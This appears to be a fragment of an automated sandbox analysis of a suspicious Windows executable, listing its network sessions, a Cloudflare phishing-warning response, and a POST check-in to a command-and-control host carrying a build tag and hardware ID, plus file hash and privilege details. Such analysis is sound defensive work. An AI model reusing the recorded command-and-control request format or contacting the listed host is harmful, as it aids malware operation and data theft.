                        Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:51 UTC | 1369 | IN
                        Data Ascii: yles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById(
                        2025-03-05 08:16:51 UTC | 1369 | IN
                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action
                        2025-03-05 08:16:51 UTC | 1005 | IN
                        Data Ascii: "cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Perform
                        2025-03-05 08:16:51 UTC | 5 | IN
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | 7468 | C:\Users\user\Desktop\random(3).exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-03-05 08:16:52 UTC | 364 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 89
                        Host: explorebieology.run
                        2025-03-05 08:16:52 UTC | 89 | OUT
                        Data Ascii: act=get_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=&hwid=B457E3BCA44424B7F2B10509AF0DFFAA
                        2025-03-05 08:16:56 UTC | 272 | IN | HTTP/1.1 200 OK
                        Date: Wed, 05 Mar 2025 08:16:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Server: cloudflare
                        Vary: Accept-Encoding
                        Cf-Cache-Status: DYNAMIC
                        CF-RAY: 91b82c783ffe1b53-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-03-05 08:16:56 UTC | 54 | IN
                        Data Ascii: 30Gzd+N+fHowWUd6aUf9lt3AefZgBbCU1CxrU6EfgwxRBAag==
                        2025-03-05 08:16:56 UTC | 5 | IN
                        Data Ascii: 0



                        Target ID: 0
                        Start time: 03:16:44
                        Start date: 05/03/2025
                        Path: C:\Users\user\Desktop\random(3).exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\random(3).exe"
                        Imagebase: 0x7f0000
                        File size: 3'042'304 bytes
                        MD5 hash: 8D0CBD77E8D4828AA0DF4BB88339F6AC
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: low
                        Has exited: true
